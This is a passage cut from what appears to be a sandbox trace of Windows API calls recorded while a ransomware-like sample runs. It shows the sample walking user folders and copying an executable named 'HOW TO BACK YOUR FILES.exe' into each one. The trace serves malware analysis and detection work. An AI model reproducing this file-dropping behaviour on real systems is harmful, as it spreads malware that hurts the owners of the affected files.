dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.695] GetLastError () returned 0x0 [0090.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.695] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.695] CloseHandle (hObject=0x120) returned 1 [0090.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.695] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.695] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music" [0090.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.695] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music") returned 84 [0090.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music" [0090.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.696] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.696] GetLastError () returned 0x0 [0090.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.696] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.696] CloseHandle (hObject=0x120) returned 1 [0090.696] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.696] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.697] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop" [0090.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0090.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0090.697] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop") returned 60 [0090.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop" [0090.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.697] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.697] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.697] GetLastError () returned 0x0 [0090.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.698] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.698] CloseHandle (hObject=0x120) returned 1 [0090.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.698] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.698] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Desktop\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53c55e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53c55e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.698] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data" [0090.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0090.698] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data") returned 69 [0090.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data" [0090.698] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.698] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.699] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.699] GetLastError () returned 0x0 [0090.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.699] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.699] CloseHandle (hObject=0x120) returned 1 [0090.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.699] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x454b2140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x454b2140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.699] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates" [0090.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7af0 | out: hHeap=0x2b0000) returned 1 [0090.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0090.700] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates") returned 79 [0090.700] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates" [0090.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.700] GetLastError () returned 0x0 [0090.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.700] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.701] CloseHandle (hObject=0x120) returned 1 [0090.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.701] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.701] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.701] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun" [0090.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0090.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.701] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun") returned 73 [0090.701] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun" [0090.701] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.701] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\sun\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.702] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.702] GetLastError () returned 0x0 [0090.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.702] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.702] CloseHandle (hObject=0x120) returned 1 [0090.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.702] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.702] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java" [0090.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7af0 | out: hHeap=0x2b0000) returned 1 [0090.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.702] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java") returned 78 [0090.702] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java" [0090.702] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.702] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\sun\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.703] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.703] GetLastError () returned 0x0 [0090.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.703] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.703] CloseHandle (hObject=0x120) returned 1 [0090.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.703] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.703] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb0d340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb0d340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.704] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update" [0090.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0090.704] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned 90 [0090.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update" [0090.704] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.704] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\sun\\java\\java update\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.704] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.705] GetLastError () returned 0x0 [0090.705] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.705] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.705] CloseHandle (hObject=0x120) returned 1 [0090.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.705] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.705] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Sun\\Java\\Java Update\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bb334a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb334a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.705] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu" [0090.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0090.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0090.705] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu") returned 80 [0090.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu" [0090.705] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.705] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.706] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.706] GetLastError () returned 0x0 [0090.706] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.706] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.706] CloseHandle (hObject=0x120) returned 1 [0090.706] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.706] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.706] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59468c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59468c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.707] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs" [0090.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs" [0090.707] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.707] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application 